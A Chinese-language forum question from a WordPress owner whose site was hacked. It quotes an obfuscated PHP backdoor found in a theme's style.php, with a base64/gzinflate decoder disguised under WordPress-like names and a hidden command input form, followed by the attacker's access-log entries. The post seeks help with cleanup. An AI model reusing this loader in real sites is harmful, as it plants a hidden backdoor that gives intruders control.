WordPress漏洞问题

我的wordpress网站刚刚被黑客入侵，在查看日志后，我发现他们利用了这个文件：www/wp-content/themes/mytheme/style.php

浏览此链接时 www.mywebsite.com/wp-content/themes/mytheme/style.php 我找到一个带有按钮的输入字段。所以我想这就是他们上传 shell 脚本的地方。

function pre_term_name( $wp_kses_data, $wp_nonce ) {
$kses_str = str_replace( array ('%', '*'), array ('/', '='), $wp_kses_data );
$filter = base64_decode( $kses_str );
$md5 = strrev( $wp_nonce );
$sub = substr( md5( $md5 ), 0, strlen( $wp_nonce ) );
$wp_nonce = md5( $wp_nonce ). $sub;
$preparefunc = 'gzinflate';
$i = 0; do {
    $ord = ord( $filter[$i] ) - ord( $wp_nonce[$i] );
    $filter[$i] = chr( $ord % 256 );
    $wp_nonce .= $filter[$i]; $i++;
} while ($i < strlen( $filter ));
return @$preparefunc( $filter );
} 
$wp_auth_check = '<form method= "post" action= ""> <input type= "input" name= "_f_wp" value= ""/><input type= "submit" value= "&gt;"/></form>';

如何解决此漏洞？谢谢

原木：

195.211.142.36 - - [19/May/2017:19:00:17 +0100] "POST /wp-content/themes/mytheme/style.php HTTP/1.1" 301 - "http://mywebsite.com/wp-content/themes/mytheme/style.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:18 +0100] "GET /wp-content/themes/mytheme/style.php HTTP/1.1" 200 123 "http://mywebsite.com/wp-content/themes/mytheme/style.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:27 +0100] "GET /TEST777/system.php?ar=test333.zip HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:33 +0100] "GET /TEST777/test111 HTTP/1.1" 200 270 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"
195.211.142.36 - - [19/May/2017:19:00:40 +0100] "GET /wp-content/themes/mytheme/style.php HTTP/1.1" 200 7680 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; AMD64)"